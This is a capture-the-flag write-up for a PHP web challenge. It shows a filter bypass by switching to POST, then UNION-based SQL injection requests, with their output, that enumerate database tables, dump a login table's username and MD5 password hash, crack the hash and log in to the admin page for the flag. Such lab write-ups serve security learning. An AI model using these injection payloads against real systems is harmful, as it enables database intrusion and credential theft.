Tags: sqli php
Rating: 1.8
# ▼▼▼Naughty ads - Web (200point)(122/500team=24.4%)▼▼▼
**This writeup is written by [@kazkiti_ctf](https://twitter.com/kazkiti_ctf)**
GET /robots.txt
↓
```
User-agent: *
Disallow: /admin
Disallow: /*.phps
```
GET /index.phps
↓
```
<HTML>
<HEAD>
<TITLE>NAUGHTY ADS c1994</TITLE>
</HEAD>
<BODY BGCOLOR="WHITE">
<CENTER>
Home
</CENTER>
</BODY>
</HTML>
<HTML>
<HEAD>
<TITLE>NAUGHTY ADS c1994</TITLE>
</HEAD>
<BODY BGCOLOR="WHITE">
<CENTER>
<map name="planetmap">
<area shape="rect" coords="287,93,523,261" href="?id=<?php echo array_pop($cols); ?>" alt="BDSM hookup">
<area shape="rect" coords="542,93,774,261" href="?id=<?php echo array_pop($cols); ?>" alt="Fat fetish">
<area shape="rect" coords="34,282,269,449" href="?id=<?php echo array_pop($cols); ?>" alt="Dirty mistress">
<area shape="rect" coords="292,282,521,449" href="?id=<?php echo array_pop($cols); ?>" alt="Femdom one night stand">
<area shape="rect" coords="545,282,777,449" href="?id=<?php echo array_pop($cols); ?>" alt="Waterboarding extasy">
<area shape="rect" coords="33,468,266,595" href="?id=<?php echo array_pop($cols); ?>" alt="Kinky nightmare">
<area shape="rect" coords="277,456,534,598" href="?id=<?php echo array_pop($cols); ?>" alt="Food fetish">
<area shape="rect" coords="547,466,780,599" href="?id=<?php echo array_pop($cols); ?>" alt="Whip experience">
<area shape="rect" coords="595,23,619,57" href="/admin" alt="Admin">
</map>
</CENTER>
</BODY>
</HTML>
```
↓
$REQUEST['id'] ⇒ filter and $GET['id'] ⇒**SQL injection**
↓
**POST method** To bypass filter.
↓
**POST** /index.php?id='UNION+select+group_concat(**table_name**)+from+information_schema.tables--+
↓
```
CHARACTER_SETS,COLLATIONS,COLLATION_CHARACTER_SET_APPLICABILITY,COLUMNS,COLUMN_PRIVILEGES,ENGINES,EVENTS,FILES,GLOBAL_STATUS,GLOBAL_VARIABLES,KEY_COLUMN_USAGE,OPTIMIZER_TRACE,PARAMETERS,PARTITIONS,PLUGINS,PROCESSLIST,PROFILING,REFERENTIAL_CONSTRAINTS,ROUTINES,SCHEMATA,SCHEMA_PRIVILEGES,SESSION_STATUS,SESSION_VARIABLES,STATISTICS,TABLES,TABLESPACES,TABLE_CONSTRAINTS,TABLE_PRIVILEGES,TRIGGERS,USER_PRIVILEGES,VIEWS,INNODB_LOKS,INNODB_TRX,INNODB_SYS_DATAFILES,INNODB_FT_CONFIG,INNODB_SYS_VIRTUAL,INNODB_CMP,INNODB_FT_BEING_DELETED,INNODB_CMP_RESET,INNODB_CMP_PER_INDEX,INNODB_CMPMEM_RESET,INNODB_FT_DELETED,INNODB_BUFFER_PAGE_LRU,INNODB_LOCK_WAITS,INNODB_TEMP_TABLE_INFO,INNODB_SYS_INDEXES,INNODB_SYS_TABLES,INNODB_SYS_FIELDS,INNODB_CMP_PER_INDEX_RESET,INNODB_BUFFER_PAGE,INNODB_FT_DEFAULT_STOPWORD,INNODB_FT_INDEX_TABLE,INNODB_FT_INDEX_CACHE,INNODB_SYS_TABLESPACES,INNODB_METRICS,INNODB_SYS_FOREIGN_COLS,INNODB_CMPMEM,INNODB_BUFFER_POOL_STATS,INNODB_SYS_COLUMNS,INNODB_SYS_FOREIGN,INNODB_SYS_TABLESTATS,ads,login
```
POST /index.php?id='UNION+select+group_concat(**column_name**)+from+information_schema.columns+where+table_name='**login**'--+
↓
```
id,name,password
```
POST /index.php?id='UNION+select+group_concat(**name**)from+**login**--+
↓
```
webmasterofdoom3755
```
POST /index.php?id='UNION+select+group_concat(**password**)from+**login**--+
↓
```
5ebe2294ecd0e0f08eab7690d2a6ee69
```
↓google search
MD5(**secret**)
GET /admin/
↓
Input Basic Authentication 「webmasterofdoom3755:secret」
↓
Input his phone number is "**555-31338**"
↓
**SECT{~tr4nsv3stiT3s_w3lc0me_t00~}**